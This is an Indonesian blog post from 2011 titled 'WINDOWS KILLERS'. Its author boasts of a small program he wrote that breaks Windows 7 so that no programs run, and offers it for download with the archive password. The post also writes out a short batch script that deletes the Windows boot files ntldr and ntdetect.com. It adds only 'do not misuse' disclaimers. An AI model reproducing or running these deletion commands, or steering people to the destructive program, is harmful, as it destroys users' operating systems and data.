Sabtu, 19 November 2011

WINDOWS KILLERS

bila ada satu hasrat
ingin membuat kerusakan
maka buang jauh-jauh
hasrat kobodohan otak itu.....!


                                            sajak warna dunia


Membuat kerusakan ternyata sangatlah mudah, lain halnya dengan membenarkan atau membetulkan itu jauh lebih sulit.Pada kesempatan kali ini saya hanya ingin menyampaikan atau men-share tentang sebuah program yang hanya berukuran beberapa kb saja tetapi sanggup membuat microsoft windows lumpuh.Programnyapun sangat sederhana dan hanya terdiri dari kurang lebih lima ( 5 ) baris perintah atau sintax.lima baris perintah namun sanggup membuat  atau melumpuhkan windows mengapa bisa terjadi demikian? jawabannya karena microsoft memberikan kemudahan-kemudahan kepada user atau pihak developer software untuk mengembangkan program atau software pihak ketiga berjalan di OS-nya.dan karena dengan kemudahan-kemudahan inilah maka tak heran bila windows menjadi paling banyak dipakai sebagai system operasi komputer di masyarakat.Namun karena kemudahan ini pula banyak orang-orang iseng yang tidak bertanggung jawab membuat sebuah program perusak seperti virus, trojan ,worm atau spyware.Mungkin sudah hukum alam dimana banyak kemudahan maka celah keamananpun semakin terbuka lebar.Sebagai contoh saya iseng membuat program mini ini yang hanya berukuran kurang lebih 284Kb namun sanggup membuat windows 7 sp1 saya menjadi Eror tidak bisa mengeksekusi semua program, untuk windows xp saya belum mencobanya karena saya tidak mempunyai orang yang suka rela di jadikan percobaan ( mau saya coba di warnet takut tuh komputer benar-benar rusak windowsnya, dosa dech saya ).Dan bila program ini tidak ada interfacenya mungkin ukurannyapun bisa hanya sekitar 50Kb.Sebenarnya dengan modal command prompt pun suha sangat bisa membuat windows rusak seperti script dibawah ini:
echo off
del C:\ntldr
del C:\ntdetect.com
namun cara tersebut termasuk extrim dan terkesan kuno atau primitif kalau yang beginian sih virus - virus jadul juga sudah pada pake... :) 
kita lihat saja berikut screenshort programnya: Saya sudah coba di pc punya saya dan upaya untuk membenarkannya saya tidak bisa, harus boot pakai BartPE saya coba boot pakai hirens boot 13.1 tetapi gagal dalam membuka regedit windows 7 sp1 saya file not support.Mungkin kalau memakai hirens boot yang versi 15.1 bisa, saya belum mencobanya,jadi saya hanya berpesan JANGAN DISALAH GUNAKAN. 










program ini dapat di download disini
password = www.dendrif-deo.co.cc[killers]


NB: PENYALAH GUNAAN PROGRAM INI MENJADI TANGGUNG JAWAB MASING-MASING, SIAPA YANG MENUAI HARUS BERANI MEMPERTANGGUNG JAWABKANNYA.















Tidak ada komentar:

Posting Komentar